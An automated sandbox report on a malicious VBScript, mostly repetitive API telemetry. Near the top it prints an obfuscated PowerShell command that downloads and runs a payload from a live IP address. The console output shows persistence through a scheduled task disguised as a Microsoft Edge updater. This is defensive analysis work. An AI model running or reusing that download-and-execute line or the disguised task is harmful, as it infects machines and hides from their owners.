Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 11, 2024, 5:45 p.m.	July 11, 2024, 5:47 p.m.

Size	10.3KB
Type	ASCII text, with CRLF line terminators
MD5	`f3a9219e977b293b8cb364f8c8378284`
SHA256	`b72c0371a70cfeab0cfe44b72ef08716f6a3345cce395453e4cf931bf1f603ae`
CRC32	`6914F13B`
ssdeep	`192:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/QFfW6V5k6uS3N7AVzSXqLFCy+/7lm70OR:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/h`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\vd.txt.vbs
2564
- cmd.exe "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2644
  - powershell.exe POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    2728

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
66.225.254.182	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 11, 2024, 5:45 p.m.			0	0

Command line console output was observed (50 out of 69 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: Task not found. Creating task... console_handle: 0x0000001f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: Name : MicrosoftEdgeUpdateTask console_handle: 0x0000002b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: Path : \MicrosoftEdgeUpdateTask console_handle: 0x0000002f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: State : 3 console_handle: 0x00000033	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: Enabled : True console_handle: 0x00000037	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: LastRunTime : 1899-12-30 오전 12:00:00 console_handle: 0x0000003b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: LastTaskResult : 1 console_handle: 0x0000003f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: NumberOfMissedRuns : 0 console_handle: 0x00000043	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: NextRunTime : 2024-07-12 오전 3:47:23 console_handle: 0x00000047	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: Definition : System.__ComObject console_handle: 0x0000004b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: Xml : <?xml version="1.0" encoding="UTF-16"?> console_handle: 0x0000004f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Task version="1.2" xmlns="http://schemas.microsoft.com/wi console_handle: 0x00000053	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: ndows/2004/02/mit/task"> console_handle: 0x00000057	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <RegistrationInfo> console_handle: 0x0000005b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Description>Runs a script every 2 minutes</Descriptio console_handle: 0x0000005f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: n> console_handle: 0x00000063	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: </RegistrationInfo> console_handle: 0x00000067	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Triggers> console_handle: 0x0000006b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <TimeTrigger> console_handle: 0x0000006f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Repetition> console_handle: 0x00000073	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Interval>PT2M</Interval> console_handle: 0x00000077	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <StopAtDurationEnd>false</StopAtDurationEnd> console_handle: 0x0000007b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: </Repetition> console_handle: 0x0000007f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <StartBoundary>2024-07-12T03:45:23</StartBoundary> console_handle: 0x00000083	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Enabled>true</Enabled> console_handle: 0x00000087	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: </TimeTrigger> console_handle: 0x0000008b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: </Triggers> console_handle: 0x0000008f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Settings> console_handle: 0x00000093	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesP console_handle: 0x00000097	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: olicy> console_handle: 0x0000009b	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <DisallowStartIfOnBatteries>false</DisallowStartIfOnBa console_handle: 0x0000009f	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: tteries> console_handle: 0x000000a3	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> console_handle: 0x000000a7	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <AllowHardTerminate>true</AllowHardTerminate> console_handle: 0x000000ab	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <StartWhenAvailable>false</StartWhenAvailable> console_handle: 0x000000af	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvai console_handle: 0x000000b3	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: lable> console_handle: 0x000000b7	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <IdleSettings> console_handle: 0x000000bb	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Duration>PT10M</Duration> console_handle: 0x000000bf	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <WaitTimeout>PT1H</WaitTimeout> console_handle: 0x000000c3	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <StopOnIdleEnd>true</StopOnIdleEnd> console_handle: 0x000000c7	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <RestartOnIdle>false</RestartOnIdle> console_handle: 0x000000cb	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: </IdleSettings> console_handle: 0x000000cf	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <AllowStartOnDemand>true</AllowStartOnDemand> console_handle: 0x000000d3	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Enabled>true</Enabled> console_handle: 0x000000d7	1	1
WriteConsoleW July 11, 2024, 5:45 p.m.	buffer: <Hidden>false</Hidden> console_handle: 0x000000db	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bff18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c0898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x062748d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x062748d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x062748d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x062748d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x062748d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x062748d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 11, 2024, 5:45 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 160 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72511000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72512000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
